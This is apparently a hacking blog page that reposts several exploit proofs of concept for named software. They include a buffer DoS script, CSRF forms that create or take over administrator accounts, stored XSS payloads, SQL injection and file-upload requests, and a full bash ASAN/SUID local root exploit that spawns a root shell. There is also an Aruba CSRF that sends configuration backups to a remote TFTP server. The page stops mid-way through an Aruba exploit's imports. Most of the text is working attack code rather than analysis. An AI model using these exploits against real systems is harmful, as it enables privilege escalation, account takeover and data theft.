# Exploit Title: aSc TimeTables 2020.11.4 - Denial of Service (PoC)
# Date: 2020-24-02
# Exploit Author: Ismael Nava
# Vendor Homepage: https://www.asctimetables.com/#!/home
# Software Link: https://www.asctimetables.com/#!/home/download
# Version: 2020.11.4
# Tested on: Windows 10 Home x64
# CVE : n/a
# STEPS
# Open the program aSc Timetables 2020
# In File select the option New
# Put any letter in the fiel Name of the Schooland click Next
# In the next Windows click NEXT
# In the Step 3, in Subject click in New
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Tables.txt"
# Paste the content in the field Subject title
# Click in OK
# End :)
buffer = 'Z' * 1000
try:
file = open("Tables.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863113893
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: aSc Timetables 2017 input field buffer overflow and code execution
# Date: 2017-01-12
# Exploit Author: Peter Baris
# Exploit code: http://saptech-erp.com.au/resources/Timetables.zip
# Exploit documentation: http://saptech-erp.com.au/resources/TimeTables_2017.pdf
# Software Link: http://www.asctimetables.com/download/aScTimeTables.exe
# Version: 1.0.0.1
# Tested on: Windows Server 2008 R2 x64, Windows 7 Pro x64, Windows Server 2012 R2 x64, Windows Server 2016 x64
POC:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41031.zip
Asbru Web Content Management System v9.2.7 Multiple Vulnerabilities
Vendor: Asbru Ltd.
Product web page: http://www.asbrusoft.com
Affected version: 9.2.7
Summary: Ready to use, full-featured, database-driven web content management
system (CMS) with integrated community, databases, e-commerce and statistics
modules for creating, publishing and managing rich and user-friendly Internet,
Extranet and Intranet websites.
Desc: Asbru WCM suffers from multiple vulnerabilities including Cross-Site Request
Forgery, Stored Cross-Site Scripting, Open Redirect and Information Disclosure.
Tested on : Apache Tomcat/5.5.23
Apache/2.2.3 (CentOS)
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5314
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5314.php
09.03.2016
--
#1
Directory Traversal:
--------------------
http://10.0.0.7/../../../../../WEB-INF/web.xml
#2
Open Redirect:
--------------
http://10.0.0.7/login_post.jsp?url=http://www.zeroscience.mk
#3
Cross-Site Request Forgery (Add 'administrator' With Full Privileges):
----------------------------------------------------------------------
<html>
<body>
<form action="http://10.0.0.7/webadmin/users/create_post.jsp?id=&redirect=" method="POST">
<input type="hidden" name="userinfo" value=" <TEST></TEST> " />
<input type="hidden" name="title" value="Mr" />
<input type="hidden" name="name" value="Chekmidash" />
<input type="hidden" name="organisation" value="ZSL" />
<input type="hidden" name="email" value="test@testingus.io" />
<input type="hidden" name="gender" value="1" />
<input type="hidden" name="birthdate" value="1984-01-01" />
<input type="hidden" name="birthday" value="01" />
<input type="hidden" name="birthmonth" value="01" />
<input type="hidden" name="birthyear" value="1984" />
<input type="hidden" name="notes" value="CSRFNote" />
<input type="hidden" name="userinfo1" value="" />
<input type="hidden" name="userinfoname" value="" />
<input type="hidden" name="username" value="hackedusername" />
<input type="hidden" name="password" value="password123" />
<input type="hidden" name="userclass" value="administrator" />
<input type="hidden" name="usergroup" value="" />
<input type="hidden" name="usertype" value="" />
<input type="hidden" name="usergroups" value="Account Managers" />
<input type="hidden" name="usergroups" value="Company Bloggers" />
<input type="hidden" name="usergroups" value="Customer" />
<input type="hidden" name="usergroups" value="Event Managers" />
<input type="hidden" name="usergroups" value="Financial Officers" />
<input type="hidden" name="usergroups" value="Forum Moderator" />
<input type="hidden" name="usergroups" value="Human Resources" />
<input type="hidden" name="usergroups" value="Intranet Managers" />
<input type="hidden" name="usergroups" value="Intranet Users" />
<input type="hidden" name="usergroups" value="Newsletter" />
<input type="hidden" name="usergroups" value="Press Officers" />
<input type="hidden" name="usergroups" value="Product Managers" />
<input type="hidden" name="usergroups" value="Registered Users" />
<input type="hidden" name="usergroups" value="Shop Managers" />
<input type="hidden" name="usergroups" value="Subscribers" />
<input type="hidden" name="usergroups" value="Support Ticket Administrators" />
<input type="hidden" name="usergroups" value="Support Ticket Users" />
<input type="hidden" name="usergroups" value="User Managers" />
<input type="hidden" name="usergroups" value="Website Administrators" />
<input type="hidden" name="usergroups" value="Website Developers" />
<input type="hidden" name="users_group" value="" />
<input type="hidden" name="users_type" value="" />
<input type="hidden" name="creators_group" value="" />
<input type="hidden" name="creators_type" value="" />
<input type="hidden" name="editors_group" value="" />
<input type="hidden" name="editors_type" value="" />
<input type="hidden" name="publishers_group" value="" />
<input type="hidden" name="publishers_type" value="" />
<input type="hidden" name="administrators_group" value="" />
<input type="hidden" name="administrators_type" value="" />
<input type="hidden" name="scheduled_publish" value="2016-03-13 00:00" />
<input type="hidden" name="scheduled_publish_email" value="" />
<input type="hidden" name="scheduled_notify" value="" />
<input type="hidden" name="scheduled_notify_email" value="" />
<input type="hidden" name="scheduled_unpublish" value="" />
<input type="hidden" name="scheduled_unpublish_email" value="" />
<input type="hidden" name="invoice_name" value="Icebreaker" />
<input type="hidden" name="invoice_organisation" value="Zero Science Lab" />
<input type="hidden" name="invoice_address" value="nu" />
<input type="hidden" name="invoice_postalcode" value="1300" />
<input type="hidden" name="invoice_city" value="Neverland" />
<input type="hidden" name="invoice_state" value="ND" />
<input type="hidden" name="invoice_country" value="ND" />
<input type="hidden" name="invoice_phone" value="111-222-3333" />
<input type="hidden" name="invoice_fax" value="" />
<input type="hidden" name="invoice_email" value="lab@zeroscience.tld" />
<input type="hidden" name="invoice_website" value="www.zeroscience.mk" />
<input type="hidden" name="delivery_name" value="" />
<input type="hidden" name="delivery_organisation" value="" />
<input type="hidden" name="delivery_address" value="" />
<input type="hidden" name="delivery_postalcode" value="" />
<input type="hidden" name="delivery_city" value="" />
<input type="hidden" name="delivery_state" value="" />
<input type="hidden" name="delivery_country" value="" />
<input type="hidden" name="delivery_phone" value="" />
<input type="hidden" name="delivery_fax" value="" />
<input type="hidden" name="delivery_email" value="" />
<input type="hidden" name="delivery_website" value="" />
<input type="hidden" name="card_type" value="VISA" />
<input type="hidden" name="card_number" value="4444333322221111" />
<input type="hidden" name="card_issuedmonth" value="01" />
<input type="hidden" name="card_issuedyear" value="2016" />
<input type="hidden" name="card_expirymonth" value="01" />
<input type="hidden" name="card_expiryyear" value="2100" />
<input type="hidden" name="card_name" value="Hacker Hackerowsky" />
<input type="hidden" name="card_cvc" value="133" />
<input type="hidden" name="card_issue" value="" />
<input type="hidden" name="card_postalcode" value="1300" />
<input type="hidden" name="content_editor" value="" />
<input type="hidden" name="hardcore_upload" value="" />
<input type="hidden" name="hardcore_format" value="" />
<input type="hidden" name="hardcore_width" value="" />
<input type="hidden" name="hardcore_height" value="" />
<input type="hidden" name="hardcore_onenter" value="" />
<input type="hidden" name="hardcore_onctrlenter" value="" />
<input type="hidden" name="hardcore_onshiftenter" value="" />
<input type="hidden" name="hardcore_onaltenter" value="" />
<input type="hidden" name="hardcore_toolbar1" value="" />
<input type="hidden" name="hardcore_toolbar2" value="" />
<input type="hidden" name="hardcore_toolbar3" value="" />
<input type="hidden" name="hardcore_toolbar4" value="" />
<input type="hidden" name="hardcore_toolbar5" value="" />
<input type="hidden" name="hardcore_formatblock" value="" />
<input type="hidden" name="hardcore_fontname" value="" />
<input type="hidden" name="hardcore_fontsize" value="" />
<input type="hidden" name="hardcore_customscript" value="" />
<input type="hidden" name="startpage" value="" />
<input type="hidden" name="workspace_sections" value="" />
<input type="hidden" name="index_workspace" value="" />
<input type="hidden" name="index_content" value="" />
<input type="hidden" name="index_library" value="" />
<input type="hidden" name="index_product" value="" />
<input type="hidden" name="index_stock" value="" />
<input type="hidden" name="index_order" value="" />
<input type="hidden" name="index_segments" value="" />
<input type="hidden" name="index_usertests" value="" />
<input type="hidden" name="index_heatmaps" value="" />
<input type="hidden" name="index_user" value="" />
<input type="hidden" name="index_websites" value="" />
<input type="hidden" name="menu_selection" value="" />
<input type="hidden" name="statistics_reports" value="" />
<input type="hidden" name="sales_reports" value="" />
<input type="submit" value="Initiate" />
</form>
</body>
</html>
#4
Stored Cross-Site Scripting:
----------------------------
a)
POST /webadmin/content/create_post.jsp?id=&redirect= HTTP/1.1
Host: 10.0.0.7
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="webeditor_stylesheet"
/stylesheet.jsp?id=1,1&device=&useragent=&
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="restore"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="archive"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publish"
Save & Publish
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_publish"
2016-03-09 13:29
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_unpublish"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="checkedout"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="revision"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="title"
"><script>alert(document.cookie)</script>
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="searchable"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="menuitem"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file"; filename="test.svg"
Content-Type: image/svg+xml
testsvgxxefailed
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file_data"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="server_filename"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentdelivery"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image1"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image2"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image3"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfo"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentation"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="author"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="description"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="keywords"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfoname"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationname"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationvalue"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentpackage"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentclass"
image
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentgroup"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contenttype"
Photos
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version_master"
0
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="device"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usersegment"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usertest"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_top"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_up"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_previous"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_next"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_first"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_last"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="related"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="selectrelated"
------WebKitFormBoundarygqlN2AtccVFqx0YN--
b)
POST /webadmin/fileformats/create_post.jsp HTTP/1.1
Host: 10.0.0.7
filenameextension="><script>alert(document.cookie)</script>
#!/bin/bash
# unsanitary.sh - ASAN/SUID Local Root Exploit
# Exploits er, unsanitized env var passing in ASAN
# which leads to file clobbering as root when executing
# setuid root binaries compiled with ASAN.
# Uses an overwrite of /etc/ld.so.preload to get root on
# a vulnerable system. Supply your own target binary to
# use for exploitation.
# Implements the bug found here: http://seclists.org/oss-sec/2016/q1/363
# Video of Exploitation: https://www.youtube.com/watch?v=jhSIm3auQMk
# Released under the Snitches Get Stitches Public Licence.
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (18/02/2016)
# FREE LAURI LOVE!
# ---
# Original exploit: https://gist.github.com/0x27/9ff2c8fb445b6ab9c94e
# Updated by <bcoles@gmail.com>
# - fixed some issues with reliability
# - replaced symlink spraying python code with C implementation
# https://github.com/bcoles/local-exploits/tree/master/asan-suid-root
# ---
# user@linux-mint-19-2:~/Desktop$ file /usr/bin/a.out
# /usr/bin/a.out: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=f9f85a5b58074eacd5b01eae970320ed22984932, stripped
#
# user@linux-mint-19-2:~/Desktop$ ldd /usr/bin/a.out | grep libasan
# libasan.so.4 => /usr/lib/x86_64-linux-gnu/libasan.so.4 (0x00007f028d427000)
#
# user@linux-mint-19-2:~/Desktop$ objdump -x /usr/bin/a.out | grep libasan
# NEEDED libasan.so.4
#
# user@linux-mint-19-2:~/Desktop$ ASAN_OPTIONS=help=1 /usr/bin/a.out 2>&1 | grep 'flags for AddressSanitizer'
# Available flags for AddressSanitizer:
#
# user@linux-mint-19-2:~/Desktop$ ./unsanitary.sh /usr/bin/a.out
# Unsanitary - ASAN/SUID Local Root Exploit ~infodox (2016)
# [+] /usr/bin/a.out was compiled with libasan
# [.] Compiling /tmp/.libhax.c ...
# [.] Compiling /tmp/.rootshell.c ...
# [.] Compiling /tmp/.spray.c ...
# [.] Spraying /home/user/Desktop with symlinks ...
# [.] Adding /tmp/.libhax.so to /etc/ld.so.preload ...
# ./unsanitary.sh: line 135: 30663 Aborted (core dumped) ASAN_OPTIONS='disable_coredump=1 abort_on_error=1 verbosity=0' "${target}" > /dev/null 2>&1
# [.] Cleaning up...
# [+] Success:
# -rwsr-xr-x 1 root root 8384 Jan 12 14:21 /tmp/.rootshell
# [.] Launching root shell: /tmp/.rootshell
# root@linux-mint-19-2:~/Desktop# id
# uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),128(sambashare),1000(user)
# root@linux-mint-19-2:~/Desktop#
# ---
rootshell="/tmp/.rootshell"
lib="/tmp/.libhax"
spray="/tmp/.spray"
target="${1}"
log_prefix="$(cat /dev/urandom | tr -dc 'a-z0-9' | fold -w 12 | head -n 1)___"
spray_size=100
command_exists() {
command -v "${1}" >/dev/null 2>/dev/null
}
echo "Unsanitary - ASAN/SUID Local Root Exploit ~infodox (2016)"
if [[ $# -eq 0 ]] ; then
echo "use: $0 /full/path/to/targetbin"
echo "where targetbin is setuid root and compiled w/ ASAN"
exit 0
fi
if ! command_exists gcc; then
echo '[-] gcc is not installed'
exit 1
fi
if ! test -w .; then
echo '[-] working directory is not writable'
exit 1
fi
if ! test -u "${target}"; then
echo "[-] ${target} is not setuid"
exit 1
fi
if [[ $(/usr/bin/ldd "${target}") =~ "libasan.so" ]]; then
echo "[+] ${target} was compiled with libasan"
else
echo "[!] Warning: ${target} appears to have been compiled without libasan"
fi
echo "[.] Compiling ${lib}.c ..."
cat << EOF > "${lib}.c"
#include <stdlib.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
void init(void) __attribute__((constructor));
void __attribute__((constructor)) init() {
if (setuid(0) || setgid(0))
_exit(1);
unlink("/etc/ld.so.preload");
chown("${rootshell}", 0, 0);
chmod("${rootshell}", 04755);
_exit(0);
}
EOF
if ! gcc "${lib}.c" -fPIC -shared -ldl -o "${lib}.so"; then
echo "[-] Compiling ${lib}.c failed"
exit 1
fi
/bin/rm -f "${lib}.c"
echo "[.] Compiling ${rootshell}.c ..."
cat << EOF > "${rootshell}.c"
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
int main(void)
{
setuid(0);
setgid(0);
execl("/bin/bash", "bash", NULL);
}
EOF
if ! gcc "${rootshell}.c" -o "${rootshell}"; then
echo "[-] Compiling ${rootshell}.c failed"
exit 1
fi
/bin/rm -f "${rootshell}.c"
echo "[.] Compiling ${spray}.c ..."
cat << EOF > "${spray}.c"
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
int main(void)
{
pid_t pid = getpid();
char buf[64];
for (int i=0; i<=${spray_size}; i++) {
snprintf(buf, sizeof(buf), "${log_prefix}.%ld", (long)pid+i);
symlink("/etc/ld.so.preload", buf);
}
}
EOF
if ! gcc "${spray}.c" -o "${spray}"; then
echo "[-] Compiling ${spray}.c failed"
exit 1
fi
/bin/rm -f "${spray}.c"
echo "[.] Spraying $(pwd) with symlinks ..."
/bin/rm $log_prefix* >/dev/null 2>&1
$spray
echo "[.] Adding ${lib}.so to /etc/ld.so.preload ..."
ASAN_OPTIONS="disable_coredump=1 suppressions='/${log_prefix}
${lib}.so
' log_path=./${log_prefix} verbosity=0" "${target}" >/dev/null 2>&1
ASAN_OPTIONS='disable_coredump=1 abort_on_error=1 verbosity=0' "${target}" >/dev/null 2>&1
echo '[.] Cleaning up...'
/bin/rm $log_prefix*
/bin/rm -f "${spray}"
/bin/rm -f "${lib}.so"
if ! test -u "${rootshell}"; then
echo '[-] Failed'
/bin/rm "${rootshell}"
exit 1
fi
echo '[+] Success:'
/bin/ls -la "${rootshell}"
echo "[.] Launching root shell: ${rootshell}"
$rootshell
# Exploit Title: Simple PHP Shopping Cart 0.9 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-10-30
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://asaancart.wordpress.com/
# Software Link: https://vorboss.dl.sourceforge.net/project/asaancart/asaancart%20v-0.9/asaancart%20v-0.9.zip
# Version: 0.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
POST /[PATH]/admin/login.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
username=%27%6f%72%20%31%3d%31%20%6f%72%20%27%27%3d%27&password=%27%6f%72%20%31%3d%31%20%6f%72%20%27%27%3d%27&btnSubmit=btnSubmit
HTTP/1.1 302 Found
Date: Tue, 30 Oct 2018 15:46:43 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=f2a7ov3iih8u10qf9327ana635; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: index.php
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST /[PATH]/admin/add_cat.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=f2a7ov3iih8u10qf9327ana635
Connection: keep-alive
Content-Type: multipart/form-data; boundary=
---------------------------17014069073451786011304294694
Content-Length: 514
-----------------------------17014069073451786011304294694
Content-Disposition: form-data; name="category_name"
xxx
-----------------------------17014069073451786011304294694
Content-Disposition: form-data; name="category_full_image"; filename="phpinfo.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------17014069073451786011304294694
Content-Disposition: form-data; name="btn_submit"
Create
-----------------------------17014069073451786011304294694--
HTTP/1.1 200 OK
Date: Tue, 30 Oct 2018 15:46:52 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
#/[PATH]/category_images/xxx_phpinfo.php
<form action="http://localhost/[PATH]/admin/add_cat.php" enctype="multipart/form-data" method="post">
<input name="category_name" value="xxx" type="text" hidden="true">
<input name="category_full_image" type="file">
<input name="btn_submit" value="Create" type="submit">
</form>
# Exploit Title: Simple PHP Shopping Cart 0.9 - SQL Injection
# Dork: N/A
# Date: 2018-10-30
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://asaancart.wordpress.com/
# Software Link: https://vorboss.dl.sourceforge.net/project/asaancart/asaancart%20v-0.9/asaancart%20v-0.9.zip
# Version: 0.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/shop/page.php?page_id=[SQL]
#
#[PATH]/page.php
#....
#34 $page_heading = $_GET['page_name'];
#35 $page_id = $_GET['page_id'];
#....
GET /[PATH]/shop/page.php?page_id=-1+unIoN++SELect+0x31%2c0x32%2c0x33%2c0x34%2c(SEleCT+GroUP_COncAT(username,0x3a,password+sePaRATOR+0x3c62723e)+FrOM+auth_user_admin)%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Tue, 30 Oct 2018 14:01:30 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=u4nfc9bijgcbd8na09o8jp4gb0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6538
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/admin/login.php
#
#....
#32 if ($_POST['btnSubmit']=='btnSubmit')
#33 {
#34 $sql = "SELECT * FROM auth_user_admin WHERE username='".$_POST['username']."' AND password='".md5($_POST['password'])."'";
#....
# POC:
# 3)
# http://localhost/[PATH]/shop/product.php?product_id=[SQL]
#
#....
#35 $product_id = $_GET['product_id'];
#....
# Exploit Title: Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF)
# Date: November 29, 2021
# Exploit Author: =(L_L)=
# Detailed Bug Description: https://lyhinslab.org/index.php/2021/11/29/how-white-box-hacking-works-xss-csrf-in-arunna/
# Vendor Homepage: https://github.com/arunna
# Software Link: https://github.com/arunna/arunna
# Version: 1.0.0
# Tested on: Ubuntu 20.04.2 LTS
<!--
The attacker can use the CSRF PoC below to change any sensitive user data (password, email, name and so on).
-->
<html><form enctype="application/x-www-form-urlencoded" method="POST" action="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"><table><tr><td>username[0]</td><td><input type="text" value="admin" name="username[0]"></td></tr><tr><td>select[0]</td><td><input type="text" value="" name="select[0]"></td></tr>
<tr><td>first_name[0]</td><td><input type="text" value="Raden" name="first_name[0]"></td></tr>
<tr><td>last_name[0]</td><td><input type="text" value="Yudistira" name="last_name[0]"></td></tr>
<tr><td>display_name[0]</td><td><input type="text" value="Raden Yudistira" name="display_name[0]"></td></tr>
<tr><td>one_liner[0]</td><td><input type="text" value="" name="one_liner[0]"></td></tr>
<tr><td>location[0]</td><td><input type="text" value="" name="location[0]"></td></tr>
<tr><td>sex[0]</td><td><input type="text" value="1" name="sex[0]"></td></tr>
<tr><td>birthday[0]</td><td><input type="text" value="19" name="birthday[0]"></td></tr>
<tr><td>birthmonth[0]</td><td><input type="text" value="3" name="birthmonth[0]"></td></tr>
<tr><td>birthyear[0]</td><td><input type="text" value="2011" name="birthyear[0]"></td></tr>
<tr><td>bio[0]</td><td><input type="text" value="" name="bio[0]"></td></tr>
<tr><td>expertise[0][]</td><td><input type="text" value="5" name="expertise[0][]"></td></tr>
<tr><td>tags[0]</td><td><input type="text" value="Graphic Designer, Blogger, Director" name="tags[0]"></td></tr>
<tr><td>skills[0]</td><td><input type="text" value="Cooking, JQuery, Fireworks" name="skills[0]"></td></tr>
<tr><td>email[0]</td><td><input type="text" value="request@arunna.com" name="email[0]"></td></tr>
<tr><td>website[0]</td><td><input type="text" value="http://" name="website[0]"></td></tr>
<tr><td>password[0]</td><td><input type="text" value="admin12345" name="password[0]"></td></tr>
<tr><td>re_password[0]</td><td><input type="text" value="admin12345" name="re_password[0]"></td></tr>
<tr><td>user_type[0]</td><td><input type="text" value="administrator" name="user_type[0]"></td></tr>
<tr><td>status[0]</td><td><input type="text" value="1" name="status[0]"></td></tr>
<tr><td>save_changes</td><td><input type="text" value="Save User" name="save_changes"></td></tr>
</table><input type="submit" value="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"></form></html>
# Title: Aruba Mobility Controller CSRF And XSS Vulnerabilities
# Date: 08/016/2015
# Author: Itzik Chen
# Product web page: http://www.arubanetworks.com
# Affected Version: 6.4.2.8
# Tested on: Aruba7240, Ver 6.2.4.8
Summary
================
Aruba Networks is an HP company, one of the leaders in enterprise Wi-Fi.
Arube Controller suffers from CSRF and XSS vulnerabilities.
Proof of Concept - CSRF
=========================
192.168.0.1 - Controller IP-Address
172.17.0.1 - Remote TFTP server
<IMG width=1 height=1 SRC="https://192.168.0.1:4343/screens/cmnutil/copyLocalFileToTftpServerWeb.xml?flashbackup.tar.gz,172.17.0.1,flashbackup.tar.gz">
That will send the flashbackup configuration file to a remote TFTP server.
Proof of Concept - XSS
=========================
https://192.168.0.1:4343/screens/switch/switch_mon.html?mode=plog-custom&mode-title=test</td><img width=1 height=1 src=/images/logo-mobility-controller.gif onLOAD=alert(document.cookie)>
# Exploit Title: Aruba Instant 8.7.1.0 - Arbitrary File Modification
# Date: 15/07/2021
# Exploit Author: Gr33nh4t
# Vendor Homepage: https://www.arubanetworks.com/
# Version:
# Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below
# Aruba Instant 6.5.x: 6.5.4.18 and below
# Aruba Instant 8.3.x: 8.3.0.14 and below
# Aruba Instant 8.5.x: 8.5.0.11 and below
# Aruba Instant 8.6.x: 8.6.0.6 and below
# Aruba Instant 8.7.x: 8.7.1.0 and below
# Tested on: Aruba Instant
# CVE : CVE-2021-25155
import socket
import sys
import struct
import time
import threading
import urllib3
import re
import telnetlib
